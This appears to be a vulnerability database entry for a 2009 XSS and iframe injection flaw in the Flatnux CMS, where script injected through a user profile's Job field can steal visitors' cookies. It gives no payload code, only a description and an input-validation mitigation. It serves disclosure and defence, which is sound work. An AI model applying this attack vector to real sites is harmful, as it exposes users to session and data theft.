Vendor: Flatnux
By: milw0rm.com
CVSS: 7.5 (HIGH)
Cross-site Scripting (XSS)/Iframe injection
CWE: 79
Product Name: Flatnux
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
Flatnux-2009-01-27 XSS/Iframe injection p0c
A vulnerability in Flatnux allows an attacker to inject an iframe into the Job field of a user profile. This iframe can be used to execute malicious JavaScript code in the context of the vulnerable website. The malicious code can be used to steal cookies and other sensitive information from the user's browser.
Mitigation:
Input validation should be used to prevent malicious code from being injected into the Job field.